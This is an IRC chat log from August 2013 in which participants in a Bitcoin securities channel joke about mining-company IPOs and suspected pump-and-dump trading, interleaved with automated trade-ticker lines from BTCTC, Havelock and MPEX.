0.00121174 BTC [+] Aug 29 18:32:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.02499 = 0.2499 BTC [-] Aug 29 18:33:10 [BTCTC] [TAT.ASICMINER] 34 @ 0.025 = 0.85 BTC [+] Aug 29 18:33:41 [BTCTC] [ASICMINER-PT] 1 @ 2.628 BTC [+] Aug 29 18:35:58 "Do you seriously think this company is correctly valued at twice labcoin's value? All this guy is doing is buying 3rd party mining hardware while companies are out there developing their own ASICs" Aug 29 18:36:25 Which company is in reference Aug 29 18:36:36 peta-mine or whatevs Aug 29 18:36:40 ooo yea Aug 29 18:36:44 that things a fucking joke Aug 29 18:37:11 i like how they are measuring jokes in increments of jokes Aug 29 18:37:17 haha Aug 29 18:37:20 thats like a 4joke Aug 29 18:37:58 this scam is so much less believable than that scam, therefore valuation must be lower Aug 29 18:38:24 lol Aug 29 18:38:49 as amusing as it may sound, it's exactly how the dysfunctional mind works. Aug 29 18:39:20 another intersting thingy, Aug 29 18:39:27 i guess someone should start an ipo selling indulgences to get in Bitcoin heaven Aug 29 18:39:32 it's what all this shit is anyway. Aug 29 18:39:35 Ukyo randomly pays extra on his bond/loan Aug 29 18:39:46 so price goes up for a day Aug 29 18:39:48 people buy Aug 29 18:39:52 then get sad Aug 29 18:39:58 when he pays normal again Aug 29 18:40:16 "What! it means I bought overprice shares yesterday Sad" Aug 29 18:40:36 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC Aug 29 18:41:10 [BTCTC] [DMS.PURCHASE] 5 @ 0.01598 = 0.0799 BTC [+] Aug 29 18:41:34 !last havelock dealco Aug 29 18:41:35 Aren't those tins of tobacco right there behind you? Aug 29 18:42:22 [BTCTC] [ASICMINER-PT] 1 @ 2.621 BTC [-] Aug 29 18:42:59 [BTCTC] [DMS.SELLING] 6 @ 0.01259 = 0.0755 BTC [+] Aug 29 18:43:19 !ticker h dealco Aug 29 18:43:21 [HAVELOCK:DEALCO] 1D: / 0 / (0 shares, 0 BTC), 7D: / 0 / (0 shares, 0 BTC), 30D: / 0 / (0 shares, 0 BTC) Aug 29 18:43:24 :p Aug 29 18:43:27 :) Aug 29 18:43:32 !ticker h cfig Aug 29 18:43:34 [HAVELOCK:CFIG] 1D: 0.16000000 / 0.18011605 / 0.19000000 (86 shares, 15.48998002 BTC), 7D: 0.12010000 / 0.15153721 / 0.24000000 (3652 shares, 553.41387312 BTC), 30D: 0.12010000 / 0.15071224 / 0.24000000 (7882 shares, 1187.91387312 BTC) Aug 29 18:43:51 another performance in irony for you: "You're wasting time trying to explain anything to the average 'investor' here. They simply aren't smart enough to get it, though they imagine themselves to be towering geniuses. It's better if they don't get it, anyway. Cheaper shares for those of us who do." (labcoin) Aug 29 18:44:27 Poetry. Aug 29 18:44:40 lolk Aug 29 18:45:01 i guess time to stir the pot a little. Aug 29 18:45:45 i'm a towering genius Aug 29 18:45:53 we all are Aug 29 18:45:54 that's fo sure Aug 29 18:45:59 just a matter of the view Aug 29 18:46:12 silent you little ant Aug 29 18:46:16 :D Aug 29 18:46:28 it's a mc escher reality Aug 29 18:46:37 where you get to look down on me looking down at you Aug 29 18:46:57 that's called socialism Aug 29 18:47:44 one of the most dangerous plagues mankind has ever faced Aug 29 18:48:07 the other is called inflation Aug 29 18:48:39 http://thefalloutgirl.files.wordpress.com/2011/10/escher-big.jpg Aug 29 18:49:05 that's me with the loot in the middle Aug 29 18:49:50 that's not loot, thats a trash bag Aug 29 18:50:14 it's cheap shares! shh Aug 29 18:50:32 [BTCTC] [LABCOIN] 82 @ 0.003585 = 0.294 BTC [+] Aug 29 18:50:33 [BTCTC] [LABCOIN] 189 @ 0.003586 = 0.6778 BTC [+] Aug 29 18:50:34 [BTCTC] [LABCOIN] 1264 @ 0.003588 = 4.5352 BTC [+] Aug 29 18:50:36 [BTCTC] [LABCOIN] 632 @ 0.003589 = 2.2682 BTC [+] Aug 29 18:50:37 [BTCTC] [LABCOIN] 75 @ 0.003595 = 0.2696 BTC [+] Aug 29 18:50:38 [BTCTC] [LABCOIN] 200 @ 0.003599 = 0.7198 BTC [+] Aug 29 18:50:39 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [+] Aug 29 18:50:40 [BTCTC] [LABCOIN] 100 @ 0.0036 = 0.36 BTC [+] Aug 29 18:50:40 lol Aug 29 18:50:41 [BTCTC] [LABCOIN] 300 @ 0.0036 = 1.08 BTC [+] Aug 29 18:50:47 tick tick tick Aug 29 18:50:56 [BTCTC] [LABCOIN] 50 @ 0.003619 = 0.181 BTC [+] Aug 29 18:50:57 [BTCTC] [LABCOIN] 2000 @ 0.003622 = 7.244 BTC [+] Aug 29 18:50:58 [BTCTC] [LABCOIN] 2900 @ 0.003623 = 10.5067 BTC [+] Aug 29 18:51:00 [BTCTC] [LABCOIN] 2275 @ 0.003657 = 8.3197 BTC [+] Aug 29 18:51:01 [BTCTC] [LABCOIN] 303 @ 0.00367 = 1.112 BTC [+] Aug 29 18:51:02 [BTCTC] [LABCOIN] 1081 @ 0.003671 = 3.9684 BTC [+] Aug 29 18:51:03 [BTCTC] [LABCOIN] 1000 @ 0.003674 = 3.674 BTC [+] Aug 29 18:51:04 [BTCTC] [LABCOIN] 100 @ 0.003674 = 0.3674 BTC [+] Aug 29 18:51:05 [BTCTC] [LABCOIN] 3000 @ 0.003674 = 11.022 BTC [+] Aug 29 18:51:06 [BTCTC] [LABCOIN] 200 @ 0.003675 = 0.735 BTC [+] Aug 29 18:51:06 [BTCTC] [LABCOIN] 5692 @ 0.003675 = 20.9181 BTC [+] Aug 29 18:51:07 [BTCTC] [LABCOIN] 6000 @ 0.003675 = 22.05 BTC [+] Aug 29 18:51:52 [BTCTC] [DMS.SELLING] 100 @ 0.01259 = 1.259 BTC [+] Aug 29 18:52:20 [BTCTC] [LABCOIN] 189 @ 0.003674 = 0.6944 BTC [-] Aug 29 18:52:21 [BTCTC] [LABCOIN] 100 @ 0.003676 = 0.3676 BTC [+] Aug 29 18:52:22 [BTCTC] [LABCOIN] 100 @ 0.003677 = 0.3677 BTC [+] Aug 29 18:52:23 [BTCTC] [LABCOIN] 111 @ 0.003677 = 0.4081 BTC [+] Aug 29 18:52:53 [BTCTC] [PETA-MINE] 300 @ 0.65 = 195 BTC Aug 29 18:53:06 wow lol Aug 29 18:53:08 Thats a big orde Aug 29 18:53:10 rhaha Aug 29 18:53:15 good luck with that Aug 29 18:53:49 [BTCTC] [PETA-MINE] 42 @ 0.65 = 27.3 BTC Aug 29 18:54:13 they only need 32000 btc more Aug 29 18:54:17 ;;tslb Aug 29 18:54:21 Time since last block: 28 minutes and 13 seconds Aug 29 18:54:22 oops Aug 29 18:54:29 but who they gonna buy from? Aug 29 18:54:37 Such a 4joke Aug 29 18:55:33 [BTCTC] [ACTIVEMINING] 100 @ 0.00403 = 0.403 BTC [+] Aug 29 18:56:03 [BTCTC] [LABCOIN] 50 @ 0.003674 = 0.1837 BTC [-] Aug 29 18:56:11 "PETA-MINE deployment is scheduled for mid December, 2013" Aug 29 18:56:34 Might as well be 2020 Aug 29 18:56:49 maybe it's a typo Aug 29 18:57:06 mine-a-pet Aug 29 18:57:18 "The core hardware for the mine will be a 28nm chip from Cointerra. These chips have outstanding specifications when it comes to power consumption and hashing power, which, in turn, means CryptX will be able to keep power and hosting costs at a minimum. What’s more, the hashing power of the Cointerra 28nm chip is +500 GH/s, which means CryptX will be able to deploy the PETA-MINE Aug 29 18:57:18 quickly and efficiently. This strategic partnership with Cointerra means CryptX will have access to future chip developments at the most competitive rates on the market." Aug 29 18:58:10 strategic partnership with a napkin calculation. Aug 29 18:58:15 verily strategic. Aug 29 18:58:45 translation: we want to short mining by reselling shorting mining Aug 29 18:58:52 why did they call it Pedo-mine anyway Aug 29 18:58:54 "The IPO will prove successful with the sale of at least 30,000 shares. If fewer than 30,000 shares sell within 30 days, CryptX will refund the entire IPO to shareholders. What’s more, the fact that no shares beyond those offered at IPO will ever be issued means shareholders need not fear dilution of the value of their shares." Aug 29 18:59:04 ;;calc 30000 * 0.65 Aug 29 18:59:04 19500 Aug 29 18:59:32 ;;calc 19500 * 130 Aug 29 18:59:32 2535000 Aug 29 18:59:34 [BTCTC] [ACTIVEMINING] 50 @ 0.004289 = 0.2145 BTC [+] Aug 29 18:59:36 no bother calc'ing, some private investor will surely gobble any leftovers Aug 29 18:59:36 [BTCTC] [ACTIVEMINING] 50 @ 0.00429 = 0.2145 BTC [+] Aug 29 18:59:37 [BTCTC] [ACTIVEMINING] 728 @ 0.004327 = 3.1501 BTC [+] Aug 29 18:59:38 [BTCTC] [ACTIVEMINING] 250 @ 0.004328 = 1.082 BTC [+] Aug 29 18:59:39 [BTCTC] [ACTIVEMINING] 478 @ 0.004329 = 2.0693 BTC [+] Aug 29 19:00:03 hmm Aug 29 19:00:33 [BTCTC] [TAT.ASICMINER] 7 @ 0.026 = 0.182 BTC [+] Aug 29 19:00:34 [BTCTC] [LABCOIN] 144 @ 0.003671 = 0.5286 BTC [-] Aug 29 19:00:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0261 BTC [+] Aug 29 19:00:36 [BTCTC] [LABCOIN] 56 @ 0.003673 = 0.2057 BTC [+] Aug 29 19:00:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.0261 = 0.261 BTC [+] Aug 29 19:00:48 [BTCTC] [ACTIVEMINING] 640 @ 0.004563 = 2.9203 BTC [+] Aug 29 19:01:24 [BTCTC] [ACTIVEMINING] 35 @ 0.004563 = 0.1597 BTC [+] Aug 29 19:01:45 [HAVELOCK] [VTX] 2 @ 0.5612 = 1.1224 BTC [-] Aug 29 19:01:52 [HAVELOCK] [AM100] 1 @ 0.0258 BTC [+] Aug 29 19:01:55 [HAVELOCK] [VTX] 2 @ 0.5611 = 1.1222 BTC [-] Aug 29 19:03:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.0261 = 0.1044 BTC [+] Aug 29 19:03:05 I should start TAT.HAMBURGERS as performance art Aug 29 19:03:21 Hallelujah, cheap hamburgers! Aug 29 19:03:22 [BTCTC] [LABCOIN] 222 @ 0.003602 = 0.7996 BTC [-] Aug 29 19:03:23 [BTCTC] [LABCOIN] 1657 @ 0.0036 = 5.9652 BTC [-] Aug 29 19:03:26 heh Aug 29 19:03:40 [BTCTC] [LABCOIN] 106 @ 0.0036 = 0.3816 BTC [-] Aug 29 19:03:42 [BTCTC] [LABCOIN] 129 @ 0.003671 = 0.4736 BTC [+] Aug 29 19:03:56 [BTCTC] [NASTY-PT] 8 @ 0.002989 = 0.0239 BTC [+] Aug 29 19:04:16 maybe i'm onto something Aug 29 19:04:23 [BTCTC] [LABCOIN] 120 @ 0.003673 = 0.4408 BTC [+] Aug 29 19:04:53 [MPEX] [S.MPOE] 4683 @ 0.00087421 = 4.0939 BTC [+] Aug 29 19:05:07 Trendon Shavers Acquited on First Amendment, Claims Performance Art Aug 29 19:05:12 "Yes, this mine will be using Cointerra chips that will release in mid December." Aug 29 19:05:13 The $/Bite is SO much better with TAT's 76,200,,000nm burgers. Aug 29 19:05:13 [BTCTC] [LABCOIN] 482 @ 0.003677 = 1.7723 BTC [+] Aug 29 19:05:14 [BTCTC] [LABCOIN] 500 @ 0.003677 = 1.8385 BTC [+] Aug 29 19:05:15 [BTCTC] [LABCOIN] 5000 @ 0.003678 = 18.39 BTC [+] Aug 29 19:05:16 [BTCTC] [LABCOIN] 357 @ 0.003679 = 1.3134 BTC [+] Aug 29 19:05:17 [BTCTC] [LABCOIN] 2000 @ 0.00369 = 7.38 BTC [+] Aug 29 19:05:18 [BTCTC] [LABCOIN] 656 @ 0.003692 = 2.422 BTC [+] Aug 29 19:05:19 [BTCTC] [LABCOIN] 650 @ 0.003694 = 2.4011 BTC [+] Aug 29 19:05:20 [BTCTC] [LABCOIN] 500 @ 0.003696 = 1.848 BTC [+] Aug 29 19:05:22 [BTCTC] [LABCOIN] 3000 @ 0.003696 = 11.088 BTC [+] Aug 29 19:05:22 oh so they will then begin to deploy hehe Aug 29 19:05:22 [BTCTC] [LABCOIN] 500 @ 0.003699 = 1.8495 BTC [+] Aug 29 19:05:23 [BTCTC] [LABCOIN] 400 @ 0.003699 = 1.4796 BTC [+] Aug 29 19:05:24 [BTCTC] [LABCOIN] 964 @ 0.0037 = 3.5668 BTC [+] Aug 29 19:05:25 damnit Aug 29 19:05:26 ThickAsThieves: is that real? Aug 29 19:05:29 hashing maybe 2-3 months later Aug 29 19:05:38 [BTCTC] [LABCOIN] 7176 @ 0.0037 = 26.5512 BTC [+] Aug 29 19:05:39 [BTCTC] [LABCOIN] 1 @ 0.0037 BTC [+] Aug 29 19:05:41 [BTCTC] [LABCOIN] 70 @ 0.0037 = 0.259 BTC [+] Aug 29 19:06:21 [BTCTC] [LABCOIN] 2 @ 0.0037 = 0.0074 BTC [+] Aug 29 19:07:29 i think bitcoins should come with a copy of Benjamin Graham's books. Aug 29 19:08:15 [BTCTC] [LABCOIN] 122 @ 0.0037 = 0.4514 BTC [+] Aug 29 19:08:57 but it already comes with a Mircea Popescu Aug 29 19:08:59 [BTCTC] [LABCOIN] 2500 @ 0.00371 = 9.275 BTC [+] Aug 29 19:09:13 [HAVELOCK] [AM100] 9 @ 0.02525 = 0.2273 BTC [-] Aug 29 19:09:18 [BTCTC] [LABCOIN] 11500 @ 0.00371 = 42.665 BTC [+] Aug 29 19:09:19 [BTCTC] [LABCOIN] 100 @ 0.003711 = 0.3711 BTC [+] Aug 29 19:09:21 [BTCTC] [LABCOIN] 100 @ 0.00372 = 0.372 BTC [+] Aug 29 19:09:22 [BTCTC] [LABCOIN] 138 @ 0.003744 = 0.5167 BTC [+] Aug 29 19:09:23 [BTCTC] [LABCOIN] 150 @ 0.003749 = 0.5624 BTC [+] Aug 29 19:09:24 [BTCTC] [LABCOIN] 1 @ 0.003749 BTC [+] Aug 29 19:09:25 [BTCTC] [LABCOIN] 100 @ 0.003749 = 0.3749 BTC [+] Aug 29 19:09:26 [BTCTC] [LABCOIN] 6000 @ 0.00375 = 22.5 BTC [+] Aug 29 19:09:27 [BTCTC] [LABCOIN] 1000 @ 0.00375 = 3.75 BTC [+] Aug 29 19:09:28 [BTCTC] [LABCOIN] 1000 @ 0.00375 = 3.75 BTC [+] Aug 29 19:09:29 [BTCTC] [LABCOIN] 362 @ 0.00375 = 1.3575 BTC [+] Aug 29 19:09:30 well ya but graham's better. Aug 29 19:09:30 [BTCTC] [LABCOIN] 6213 @ 0.00375 = 23.2988 BTC [+] Aug 29 19:09:31 [BTCTC] [LABCOIN] 50 @ 0.00375 = 0.1875 BTC [+] Aug 29 19:09:32 [BTCTC] [LABCOIN] 2600 @ 0.00375 = 9.75 BTC [+] Aug 29 19:09:46 So Lennay Kekua, T-Bone, and Amina Abdallah Arraf al Omari walk into a bar and the bartender says, “Nobody is going to get this joke.” Aug 29 19:09:59 !ticker h labco Aug 29 19:10:01 [HAVELOCK:LABCO] 1D: 0.00261000 / 0.00329278 / 0.00330000 (288 shares, 0.94831930 BTC), 7D: 0.00224000 / 0.0028066 / 0.00345600 (14896 shares, 41.80709333 BTC), 30D: 0.00115000 / 0.00228134 / 0.00345600 (65067 shares, 148.43964770 BTC) Aug 29 19:10:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] Aug 29 19:10:56 [BTCTC] [ASICMINER-PT] 2 @ 2.621 = 5.242 BTC [-] Aug 29 19:11:01 [BTCTC] [LABCOIN] 100 @ 0.003757 = 0.3757 BTC [+] Aug 29 19:11:04 [BTCTC] [LABCOIN] 1000 @ 0.003788 = 3.788 BTC [+] Aug 29 19:11:05 [BTCTC] [LABCOIN] 2000 @ 0.003789 = 7.578 BTC [+] Aug 29 19:11:06 [BTCTC] [LABCOIN] 50 @ 0.003799 = 0.19 BTC [+] Aug 29 19:11:19 [BTCTC] [ASICMINER-PT] 5 @ 2.622 = 13.11 BTC [+] Aug 29 19:12:19 [BTCTC] [LABCOIN] 100 @ 0.0038 = 0.38 BTC [+] Aug 29 19:12:19 [BTCTC] [LABCOIN] 1 @ 0.0038 BTC [+] Aug 29 19:12:20 [BTCTC] [LABCOIN] 599 @ 0.0038 = 2.2762 BTC [+] Aug 29 19:12:49 [BTCTC] [LABCOIN] 95 @ 0.003798 = 0.3608 BTC [-] Aug 29 19:13:04 http://www.theverge.com/2013/8/29/4671692/blackberry-q10-sales-just-up-and-died-report Aug 29 19:13:07 BlackBerry Q10 sales have 'hit the ground and died' according to WSJ report | The Verge Aug 29 19:13:26 cheap shares? Aug 29 19:13:40 https://bitcointalk.org/index.php?topic=263445.msg3036308#msg3036308 Aug 29 19:13:41 http://www.bbc.co.uk/news/world-us-canada-23886031#sa-ns_mchannel=rss&ns_source=PublicRSS20-sa Aug 29 19:13:43 [BTCTC] [LABCOIN] 29 @ 0.003798 = 0.1101 BTC [-] Aug 29 19:13:44 [BTCTC] [LABCOIN] 1401 @ 0.0038 = 5.3238 BTC [+] Aug 29 19:13:45 [BTCTC] [LABCOIN] 42 @ 0.0038 = 0.1596 BTC [+] Aug 29 19:13:46 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Aug 29 19:13:47 [BTCTC] [ASICMINER-PT] 1 @ 2.586 BTC [-] Aug 29 19:13:47 curious how long they take to cover that Aug 29 19:13:47 Blackberry with Kodak pride, falls to the wayside. Aug 29 19:13:48 [BTCTC] [ASICMINER-PT] 1 @ 2.586 BTC [-] Aug 29 19:13:49 [BTCTC] [ASICMINER-PT] 4 @ 2.585 = 10.34 BTC [-] Aug 29 19:13:49 BBC News - US fast-food workers on strike over pay Aug 29 19:14:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Aug 29 19:14:15 in other news, fat people hungry. Aug 29 19:14:18 They still make Blackberry? Aug 29 19:14:25 just released a new one Aug 29 19:14:29 I have not seen one in years now Aug 29 19:14:48 [BTCTC] [LABCOIN] 4 @ 0.003798 = 0.0152 BTC [-] Aug 29 19:15:09 [BTCTC] [LABCOIN] 40 @ 0.003825 = 0.153 BTC [+] Aug 29 19:15:11 [BTCTC] [LABCOIN] 100 @ 0.003829 = 0.3829 BTC [+] Aug 29 19:15:11 jborkl probably they buy it in africa. Aug 29 19:15:12 [BTCTC] [LABCOIN] 60 @ 0.003829 = 0.2297 BTC [+] Aug 29 19:15:29 there was a huge blackberry video ad in times square when i was there Aug 29 19:15:32 ah, yeah I bet your are right Aug 29 19:15:46 you are Aug 29 19:15:49 i was amazed they still had the bidget Aug 29 19:15:54 budget* Aug 29 19:15:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02511 BTC [-] Aug 29 19:15:55 bridget ? :D Aug 29 19:16:13 lol, we all fail at spelling Aug 29 19:16:16 [BTCTC] [LABCOIN] 40 @ 0.003829 = 0.1532 BTC [+] Aug 29 19:16:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Aug 29 19:16:27 http://www.bbc.co.uk/news/technology-23869462 Aug 29 19:16:29 BBC News - How one man turns annoying cold calls into cash Aug 29 19:16:35 [BTCTC] [LABCOIN] 955 @ 0.00383 = 3.6577 BTC [+] Aug 29 19:16:38 "In November 2011 Lee Beaumont paid £10 plus VAT to set up his personal 0871 line - so to call him now costs 10p, from which he receives 7p." Aug 29 19:16:50 "The Leeds businessman told BBC Radio 4's You and Yours programme that the line had so far made £300." Aug 29 19:16:53 ahaha scammer's response to the bitbet thing ? he doesn't bet on his own scam because "it would be dishonest" Aug 29 19:17:09 awesome Aug 29 19:17:14 feels so good it hurts Aug 29 19:17:16 [BTCTC] [LABCOIN] 1 @ 0.003837 BTC [+] Aug 29 19:17:17 [BTCTC] [LABCOIN] 400 @ 0.003843 = 1.5372 BTC [+] Aug 29 19:17:18 [BTCTC] [LABCOIN] 500 @ 0.003845 = 1.9225 BTC [+] Aug 29 19:17:19 [BTCTC] [LABCOIN] 200 @ 0.003858 = 0.7716 BTC [+] Aug 29 19:17:20 [BTCTC] [LABCOIN] 738 @ 0.003868 = 2.8546 BTC [+] Aug 29 19:17:24 mircea_popescu: is that in your link? Aug 29 19:17:42 [BTCTC] [LABCOIN] 262 @ 0.003868 = 1.0134 BTC [+] Aug 29 19:17:43 [BTCTC] [LABCOIN] 300 @ 0.003869 = 1.1607 BTC [+] Aug 29 19:17:44 [BTCTC] [LABCOIN] 638 @ 0.00387 = 2.4691 BTC [+] Aug 29 19:17:46 [BTCTC] [LABCOIN] 362 @ 0.00387 = 1.4009 BTC [+] Aug 29 19:17:47 thestringpuller "that" ? Aug 29 19:17:47 [BTCTC] [LABCOIN] 111 @ 0.003871 = 0.4297 BTC [+] Aug 29 19:17:48 [BTCTC] [LABCOIN] 433 @ 0.003875 = 1.6779 BTC [+] Aug 29 19:17:49 [BTCTC] [LABCOIN] 100 @ 0.00388 = 0.388 BTC [+] Aug 29 19:17:50 [BTCTC] [LABCOIN] 1650 @ 0.00388 = 6.402 BTC [+] Aug 29 19:17:50 [BTCTC] [LABCOIN] 121 @ 0.003888 = 0.4704 BTC [+] Aug 29 19:17:51 [BTCTC] [LABCOIN] 1273 @ 0.003888 = 4.9494 BTC [+] Aug 29 19:18:00 nvm I see it Aug 29 19:18:07 [BTCTC] [RSM] 1 @ 0.01498 BTC [-] Aug 29 19:18:17 [BTCTC] [LABCOIN] 111 @ 0.003868 = 0.4293 BTC [-] Aug 29 19:18:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02503 BTC [-] Aug 29 19:18:42 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 29 19:19:15 we need a bet for active mining too Aug 29 19:19:26 [BTCTC] [LABCOIN] 110 @ 0.00386 = 0.4246 BTC [-] Aug 29 19:19:36 pankkake just as soon as they get a few BTC together to make one./ Aug 29 19:19:49 you know, out of the 3498756 billion bitcoins that were traded this month. Aug 29 19:19:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02502 BTC [-] Aug 29 19:20:03 So, what is the new deal with Avalon? They are refunding chip orders? Aug 29 19:20:20 they have the stupidest shareholders, when I go to their threads, half of them are already ignored :p Aug 29 19:20:34 [MPEX] [S.MPOE] 24153 @ 0.00087421 = 21.1148 BTC [+] Aug 29 19:20:35 [MPEX] [S.MPOE] 15747 @ 0.00087495 = 13.7778 BTC [+] Aug 29 19:20:40 http://www.bbc.co.uk/news/business-23881928 Aug 29 19:20:40 will be funnay Aug 29 19:20:44 [BTCTC] [NASTY-PT] 2 @ 0.002989 = 0.006 BTC [+] Aug 29 19:20:44 BBC News - US economic growth revised upwards to 2.5% Aug 29 19:20:44 [BTCTC] [BTC-TRADING-PT] 1 @ 1.085 BTC [+] Aug 29 19:20:45 [BTCTC] [LABCOIN] 40 @ 0.00386 = 0.1544 BTC [-] Aug 29 19:20:57 *sigh* Aug 29 19:21:35 photo in article is man holding the Sorry game Aug 29 19:21:39 intentional? Aug 29 19:22:06 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008799 = 0.0018 BTC [+] Aug 29 19:22:09 [BTCTC] [LABCOIN] 3000 @ 0.003875 = 11.625 BTC [+] Aug 29 19:22:10 [BTCTC] [LABCOIN] 527 @ 0.003888 = 2.049 BTC [+] Aug 29 19:22:11 [BTCTC] [LABCOIN] 700 @ 0.003888 = 2.7216 BTC [+] Aug 29 19:22:13 [BTCTC] [LABCOIN] 500 @ 0.00389 = 1.945 BTC [+] Aug 29 19:22:14 [BTCTC] [LABCOIN] 25 @ 0.0039 = 0.0975 BTC [+] Aug 29 19:22:15 [BTCTC] [LABCOIN] 1 @ 0.0039 BTC [+] Aug 29 19:22:16 [BTCTC] [LABCOIN] 2000 @ 0.0039 = 7.8 BTC [+] Aug 29 19:22:16 [BTCTC] [LABCOIN] 1 @ 0.0039 BTC [+] Aug 29 19:22:17 [BTCTC] [LABCOIN] 1 @ 0.0039 BTC [+] Aug 29 19:22:18 [BTCTC] [LABCOIN] 300 @ 0.003911 = 1.1733 BTC [+] Aug 29 19:22:19 [BTCTC] [LABCOIN] 100 @ 0.003912 = 0.3912 BTC [+] Aug 29 19:22:20 [BTCTC] [LABCOIN] 4000 @ 0.00392 = 15.68 BTC [+] Aug 29 19:22:21 [BTCTC] [LABCOIN] 4300 @ 0.00393 = 16.899 BTC [+] Aug 29 19:22:46 "The terms of coinlenders have changed - there's no longer a personal guarantee on the loans. As there's no guarantee AND there's no disclosure of assets backing the deposits (and they can be used for speculation not just for safe loans) I'm not certain Coinlenders even meets our investment criteria any more." says Deprived Aug 29 19:22:53 so housing and investment >+10% yet the rest is much lower. totally not a bubble Aug 29 19:23:45 in other news... https://www.google.com/search?q=the-anatomy-of-a-scam&complete=0 Aug 29 19:23:48 im #3. Aug 29 19:23:57 [BTCTC] [TAT.MINIGAME] 3 @ 0.0002418 = 0.0007 BTC [+] Aug 29 19:24:08 not for everyone Aug 29 19:24:11 [BTCTC] [ASICMINER-PT] 4 @ 2.586 = 10.344 BTC [+] Aug 29 19:24:13 [BTCTC] [ASICMINER-PT] 1 @ 2.585 BTC [-] Aug 29 19:24:14 [BTCTC] [ASICMINER-PT] 1 @ 2.585 BTC [-] Aug 29 19:24:15 [BTCTC] [ASICMINER-PT] 1 @ 2.584 BTC [-] Aug 29 19:24:16 [BTCTC] [ASICMINER-PT] 1 @ 2.583 BTC [-] Aug 29 19:24:17 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] Aug 29 19:24:18 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 29 19:24:19 [BTCTC] [ASICMINER-PT] 2 @ 2.58 = 5.16 BTC [-] Aug 29 19:24:20 [BTCTC] [ASICMINER-PT] 2 @ 2.565 = 5.13 BTC [-] Aug 29 19:24:21 [BTCTC] [ASICMINER-PT] 1 @ 2.562 BTC [-] Aug 29 19:24:22 google SEO is impossible to peg now Aug 29 19:24:22 [BTCTC] [ASICMINER-PT] 2 @ 2.562 = 5.124 BTC [-] Aug 29 19:24:23 [BTCTC] [DMS.MINING] 3 @ 0.003499 = 0.0105 BTC [-] Aug 29 19:24:24 [BTCTC] [ASICMINER-PT] 1 @ 2.625 BTC [+] Aug 29 19:24:25 pankkake ello sir. we here at us house proud to say we no serve bubble here. no bubble at all! Aug 29 19:24:38 ThickAsThieves what do you see ? Aug 29 19:24:41 #7 Aug 29 19:25:03 still pretty good tho Aug 29 19:25:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 29 19:25:13 3 for me. I am not logged in, when you are, it's often different Aug 29 19:25:19 yeah Aug 29 19:25:28 i used to think if you use random ip w/o history of search they jsuit give you "the" results Aug 29 19:25:31 seems not anymore. Aug 29 19:25:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02512 = 0.1256 BTC [+] Aug 29 19:25:55 [BTCTC] [DMS.MINING] 24 @ 0.003499 = 0.084 BTC [-] Aug 29 19:26:15 I use https://addons.mozilla.org/en-US/firefox/addon/no-cookie-for-google-search/ Aug 29 19:26:23 [BTCTC] [BASIC-MINING] 1 @ 0.1963 BTC [-] Aug 29 19:26:24 [BTCTC] [NASTY-PT] 2 @ 0.002988 = 0.006 BTC [-] Aug 29 19:26:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.02512 = 0.0754 BTC [+] Aug 29 19:26:43 [BTCTC] [LABCOIN] 1 @ 0.003897 BTC [-] Aug 29 19:26:52 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008797 = 0.0018 BTC [-] Aug 29 19:26:55 ThickAsThieves anyway, it's especially good because it's rare for a month-old article to compete well with year+ old articles. Aug 29 19:27:01 it's funny cuz trilema is obv MORE relevant to me Aug 29 19:27:09 yet ranks lower when google knows its me Aug 29 19:27:15 lol ai wins Aug 29 19:27:33 [BTCTC] [LABCOIN] 72 @ 0.003925 = 0.2826 BTC [+] Aug 29 19:27:35 [BTCTC] [LABCOIN] 200 @ 0.003928 = 0.7856 BTC [+] Aug 29 19:27:36 [BTCTC] [LABCOIN] 28 @ 0.003929 = 0.11 BTC [+] Aug 29 19:27:44 [BTCTC] [B.YABMC] 1 @ 0.0023 BTC [-] Aug 29 19:28:02 i wonder if the girl's post irked the scammer so now he's going to push his scamset to 5 just to prove how very wrong we all are. Aug 29 19:28:25 [BTCTC] [LABCOIN] 300 @ 0.003929 = 1.1787 BTC [+] Aug 29 19:28:43 [BTCTC] [LABCOIN] 1000 @ 0.003897 = 3.897 BTC [-] Aug 29 19:28:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [+] Aug 29 19:29:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 29 19:29:25 [BTCTC] [ACTIVEMINING] 340 @ 0.004114 = 1.3988 BTC [-] Aug 29 19:29:37 [BTCTC] [LABCOIN] 279 @ 0.003899 = 1.0878 BTC [+] Aug 29 19:29:46 [BTCTC] [LABCOIN] 150 @ 0.003897 = 0.5846 BTC [-] Aug 29 19:29:55 is there a finance term for this specific type of manipulation? where you sell something, then use the same money to buy up your own thing and run the price up and up Aug 29 19:30:00 [BTCTC] [LABCOIN] 571 @ 0.003897 = 2.2252 BTC [-] Aug 29 19:30:01 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002407 = 0.0005 BTC [-] Aug 29 19:30:15 [BTCTC] [DMS.MINING] 7 @ 0.00346 = 0.0242 BTC [-] Aug 29 19:30:22 Activemining and Labcoin do it so much Aug 29 19:30:41 [BTCTC] [LABCOIN] 700 @ 0.00393 = 2.751 BTC [+] Aug 29 19:30:42 [BTCTC] [LABCOIN] 1 @ 0.00393 BTC [+] Aug 29 19:30:47 ActM did sorta fade away from it when Labcoin started Aug 29 19:31:06 but daily you see the pump then the dump Aug 29 19:31:18 [BTCTC] 